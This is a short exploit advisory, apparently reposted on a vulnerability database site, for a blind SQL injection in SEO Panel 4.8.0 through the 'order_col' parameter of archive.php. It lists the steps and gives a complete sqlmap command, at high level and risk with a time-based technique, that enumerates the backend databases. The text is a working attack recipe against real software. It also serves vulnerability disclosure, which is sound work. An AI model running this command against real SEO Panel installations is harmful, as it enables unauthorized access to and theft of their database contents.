Wednesday, April 7, 2021

SEO Panel 4.8.0 - 'order_col' Blind SQL Injection

php vulnerabilities webapps In: , , 
# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
# Date: 17/02/2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: 4.8.0


# Reference - https://github.com/seopanel/Seo-Panel/issues/209

Step 1 - Login to the SEO Panel with admin credentials.
Step 2 - Go to archive.php
Step 3 - Change "order_col" value to "*" and copy the request
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
--dbs --technique=T --flush-session
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore